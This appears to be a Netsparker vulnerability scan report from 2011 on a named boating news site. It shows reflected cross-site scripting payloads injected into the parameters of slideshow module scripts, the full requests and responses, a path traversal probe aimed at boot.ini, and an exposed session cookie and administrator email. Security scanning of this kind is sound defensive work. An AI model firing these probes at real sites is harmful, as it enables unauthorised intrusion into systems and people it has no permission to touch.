Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":'"--></style></script><script>netsparker(0x001DAC)</script>,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET '"--></style></script><script>alert(0x001DD1)</script>

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001DD1)%3C/script%3E HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:26:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":'"--></style></script><script>netsparker(0x001DD1)</script>,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195
text_block_opacity GET 0
text_block_margin GET 405
module_width GET 615
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET 44
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET 0
image_y GET 0
slides_count GET 4
tick_x GET '"--></style></script><script>alert(0x001DE4)</script>
tick_y GET -22

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001DE4)%3C/script%3E&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:26:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: 270px;
position: absolute;
left: 405px;
background-color: #ffffff;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 206px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 56px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 56px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 56px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 56px;
position: absolute;
left: 405px;
top: 204px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: 1px solid ;
width: 66px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 316px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: '"--></style></script><script>netsparker(0x001DE4)</script>px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195
text_block_opacity GET 0
text_block_margin GET 405
module_width GET 615
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET 44
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET 0
image_y GET 0
slides_count GET 4
tick_x GET 405
tick_y GET '"--></style></script><script>alert(0x001DF8)</script>

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001DF8)%3C/script%3E HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:26:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: 270px;
position: absolute;
left: 405px;
background-color: #ffffff;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 206px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 56px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 56px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 56px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 56px;
position: absolute;
left: 405px;
top: 204px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: 1px solid ;
width: 66px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 316px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: '"--></style></script><script>netsparker(0x001DF8)</script>px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /index.php

/index.php CONFIRMED

http://www.soundingsonline.com/index.php?format=../../../../../../CANTBEHERE/../../../../boot.ini&ty..

Parameters

Parameter Type Value
format GET ../../../../../../CANTBEHERE/../../../../boot.ini
type GET rss

Request

GET /index.php?format=../../../../../../CANTBEHERE/../../../../boot.ini&type=rss HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Undescribed
Connection: close
Date: Tue, 25 Jan 2011 02:25:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Status: 500 View not found [name, type, prefix]: frontpage,CANTBEHEREbootini,contentView
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:25:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr"><head> <title>500 - Error: 500</title> <link rel="stylesheet" href="/templates/system/css/error.css" type="text/css" /></head><body> <div align="center"> <div id="outline"> <div id="errorboxoutline"> <div id="errorboxheader">500 - View not found [name, type, prefix]: frontpage,CANTBEHEREbootini,contentView</div> <div id="errorboxbody"> <p><strong>You may not be able to visit this page because of:</strong></p> <ol> <li>an <strong>out-of-date bookmark/favourite</strong></li> <li>a search engine that has an <strong>out-of-date listing for this site</strong></li> <li>a <strong>mistyped address</strong></li> <li>you have <strong>no access</strong> to this page</li> <li>The requested resource was not found.</li> <li>An error has occurred while processing your request.</li> </ol> <p><strong>Please try one of the following pages:</strong></p> <p> <ul> <li><a href="/index.php" title="Go to the Home Page">Home Page</a></li> </ul> </p> <p>If difficulties persist, please contact the System Administrator of this site.</p> <div id="techinfo"> <p>View not found [name, type, prefix]: frontpage,CANTBEHEREbootini,contentView</p> <p> </p> </div> </div> </div> </div> </div></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /

/ CONFIRMED

http://www.soundingsonline.com/

Identified Cookie

d4dad6935f632ac35975e3001dc7bbe8

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:24:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=v7fg3em4pehjs5etfdvqeg34e3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:24:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Featuring Boating News, Stories and More | Soundings Online</title> <link href="/index.php?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/index.php?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_new_boats&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=195px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_mishaps_and_rescues&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_know_how&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=75px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_used_boat_review&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=195px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=newsshow1&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=130px&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_seamanship_and_safety&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_blogs_and_columns&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=75px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&amp;text_block_bgcolor=ffffff&amp;text_block_width=195&amp;text_block_opacity=0&amp;text_block_margin=405&amp;module_width=615&amp;module_height=270&amp;thumbnail_bar=1&amp;thumbnail_width=66&amp;thumbnail_height=44&amp;thumbnail_margin=5&amp;thumbnail_border=1&amp;thumbnail_bar_position=1&amp;image_x=0&amp;image_y=0&amp;slides_count=4&amp;tick_x=405&amp;tick_y=-22" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_news_show_gk3/scripts/engine_compressed.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/engine_compress.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&amp;animation_slide_speed=500&amp;animation_interval=9000&amp;autoanimation=1&amp;animation_slide_type=0&amp;animation_text_type=0&amp;base_bgcolor=ffffff&amp;text_block_opacity=0&amp;thumbnail_width=66&amp;thumbnail_margin=5&amp;thumbnail_border=1&amp;thumbnail_border_color=a81c21&amp;thumbnail_border_color_inactive=ffffff&amp;interface_x=-20&amp;interface_y=0&amp;clickable_slides=1"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_home c_home m_home"><!--
Type of page: frontpage<br />Section: , s_home<br />Category: , c_home<br />Menu: 1, m_home-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a 